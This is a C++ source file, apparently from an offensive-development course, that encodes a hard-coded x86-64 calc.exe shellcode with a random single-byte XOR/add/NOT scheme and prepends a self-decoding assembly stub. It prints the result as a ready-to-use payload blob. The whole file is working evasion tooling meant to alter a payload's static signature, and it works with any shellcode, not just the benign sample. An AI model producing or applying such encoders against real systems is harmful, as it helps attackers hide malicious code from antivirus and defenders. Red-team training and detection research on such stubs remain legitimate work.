// White Knight Labs
// Offensive Development Course - Shellcode Decoder Stub
// Author: Stigs

#include <iostream>
#include <vector>
#include <iomanip>
#include <random>

// Modified function to apply obfuscation on shellcode using a dynamic XOR value
/// Encodes every byte of `data` in place as ~((byte ^ randomXorValue) + 1),
/// keeping only the low eight bits of the result.
///
/// Each step (XOR with a constant, add one, bitwise NOT) is a bijection on a
/// byte, so the transform is fully reversible by anyone who holds the key
/// byte: NOT, subtract one, XOR. It is an encoding that changes the static
/// byte pattern of the buffer, not encryption, and it gives no confidentiality
/// once the key is known.
///
/// @param data            Buffer to encode; modified in place. An empty
///                        buffer is left untouched.
/// @param randomXorValue  Single-byte key used for the XOR step.
void obfuscateBytes(std::vector<char>& data, unsigned char randomXorValue) {
    const unsigned int key = randomXorValue;
    for (std::size_t i = 0; i < data.size(); ++i) {
        // Work on the unsigned value of the byte so the arithmetic does not
        // depend on whether plain `char` is signed on this platform.
        const unsigned int plain = static_cast<unsigned char>(data[i]);
        const unsigned int encoded = ~((plain ^ key) + 1u);
        // Only the low eight bits are stored back.
        data[i] = static_cast<char>(static_cast<unsigned char>(encoded));
    }
}

/// Builds and prints a self-decoding blob: a fixed x86-64 decoder stub
/// followed by the sample payload encoded with obfuscateBytes().
///
/// Notes for anyone analysing the output:
///  - The key is one byte (256 possible values) and is stored in clear as the
///    immediate operand of the stub's `xor al, imm8`, so the payload can be
///    recovered from the blob alone.
///  - Apart from the four length bytes and the key byte, the stub is a
///    constant byte sequence, so a static signature can match on it.
///  - The stub rewrites the bytes that follow it in place and then falls
///    through into them, so the buffer it runs from has to be writable as
///    well as executable.
///
/// @return 0 always.
int main() {
    // Choose the XOR key. std::random_device only supplies the seed for the
    // Mersenne Twister; whether that seed comes from a hardware source is
    // implementation-defined.
    std::random_device entropySource;
    std::mt19937 prng(entropySource());
    std::uniform_int_distribution<> keyRange(0, 0xFF); // 0x00 .. 0xFF inclusive
    const unsigned char xorKey = static_cast<unsigned char>(keyRange(prng));

    // Sample payload: the "Calc" shellcode referenced by the original author.
    // Shellcode Link - Calc - https://www.exploit-db.com/exploits/51634
    std::vector<char> shellcode = {
        '\x48', '\x31', '\xd2', '\x65', '\x48', '\x8b', '\x42', '\x60', '\x48', '\x8b', '\x70', '\x18', '\x48', '\x8b', '\x76', '\x20',
        '\x4c', '\x8b', '\x0e', '\x4d', '\x8b', '\x09', '\x4d', '\x8b', '\x49', '\x20', '\xeb', '\x63', '\x41', '\x8b', '\x49', '\x3c',
        '\x4d', '\x31', '\xff', '\x41', '\xb7', '\x88', '\x4d', '\x01', '\xcf', '\x49', '\x01', '\xcf', '\x45', '\x8b', '\x3f', '\x4d',
        '\x01', '\xcf', '\x41', '\x8b', '\x4f', '\x18', '\x45', '\x8b', '\x77', '\x20', '\x4d', '\x01', '\xce', '\xe3', '\x3f', '\xff',
        '\xc9', '\x48', '\x31', '\xf6', '\x41', '\x8b', '\x34', '\x8e', '\x4c', '\x01', '\xce', '\x48', '\x31', '\xc0', '\x48', '\x31',
        '\xd2', '\xfc', '\xac', '\x84', '\xc0', '\x74', '\x07', '\xc1', '\xca', '\x0d', '\x01', '\xc2', '\xeb', '\xf4', '\x44', '\x39',
        '\xc2', '\x75', '\xda', '\x45', '\x8b', '\x57', '\x24', '\x4d', '\x01', '\xca', '\x41', '\x0f', '\xb7', '\x0c', '\x4a', '\x45',
        '\x8b', '\x5f', '\x1c', '\x4d', '\x01', '\xcb', '\x41', '\x8b', '\x04', '\x8b', '\x4c', '\x01', '\xc8', '\xc3', '\xc3', '\x41',
        '\xb8', '\x98', '\xfe', '\x8a', '\x0e', '\xe8', '\x92', '\xff', '\xff', '\xff', '\x48', '\x31', '\xc9', '\x51', '\x48', '\xb9',
        '\x63', '\x61', '\x6c', '\x63', '\x2e', '\x65', '\x78', '\x65', '\x51', '\x48', '\x8d', '\x0c', '\x24', '\x48', '\x31', '\xd2',
        '\x48', '\xff', '\xc2', '\x48', '\x83', '\xec', '\x28', '\xff', '\xd0'
    };

    // Encode the payload in place with the chosen key.
    obfuscateBytes(shellcode, xorKey);

    // The stub needs the payload length as a 32-bit little-endian immediate.
    const size_t payloadLength = shellcode.size();

    std::vector<char> decoderStub;
    // decoderStub.push_back('\xcc'); // INT 3 breakpoint for debugging - left disabled
    decoderStub.push_back('\xbe'); // opcode of `mov esi, imm32`; the length follows
    for (int shift = 0; shift < 32; shift += 8) {
        // Least significant byte first; anything above 32 bits is dropped.
        decoderStub.push_back(static_cast<char>((payloadLength >> shift) & 0xFF));
    }

    // Remainder of the stub. The relative displacements (0x16, 0x11, 0xea)
    // depend on this exact byte layout, so the sequence is kept as is.
    const char stubTail[] = {
        '\x48', '\x8d', '\x3d', '\x16', '\x00', '\x00', '\x00', // lea rdi, [rip+0x16]  -> first payload byte
        '\x48', '\x85', '\xf6',                                 // test rsi, rsi
        '\x74', '\x11',                                         // jz +0x11             -> decoded payload
        '\x48', '\xff', '\xce',                                 // dec rsi
        '\x8a', '\x04', '\x37',                                 // mov al, [rdi+rsi]
        '\xf6', '\xd0',                                         // not al
        '\xfe', '\xc8',                                         // dec al
        '\x34', static_cast<char>(xorKey),                      // xor al, <key>
        '\x88', '\x04', '\x37',                                 // mov [rdi+rsi], al
        '\xeb', '\xea',                                         // jmp -22              -> back to the test
    };
    decoderStub.insert(decoderStub.end(), stubTail, stubTail + sizeof(stubTail));

    // Final blob: stub first, encoded payload directly after it.
    std::vector<char> combinedData;
    combinedData.reserve(decoderStub.size() + shellcode.size());
    combinedData.insert(combinedData.end(), decoderStub.begin(), decoderStub.end());
    combinedData.insert(combinedData.end(), shellcode.begin(), shellcode.end());

    // Print the blob as a \xNN escape sequence on a single line.
    std::cout << "Obfuscated Shellcode with Decoder Stub: ";
    std::cout << std::hex << std::setfill('0'); // both settings persist on the stream
    for (std::size_t i = 0; i < combinedData.size(); ++i) {
        // Go through unsigned char so a negative char does not sign-extend.
        const unsigned int value = static_cast<unsigned char>(combinedData[i]);
        std::cout << "\\x" << std::setw(2) << value; // setw applies to the next field only
    }
    std::cout << std::endl;

    return 0;
}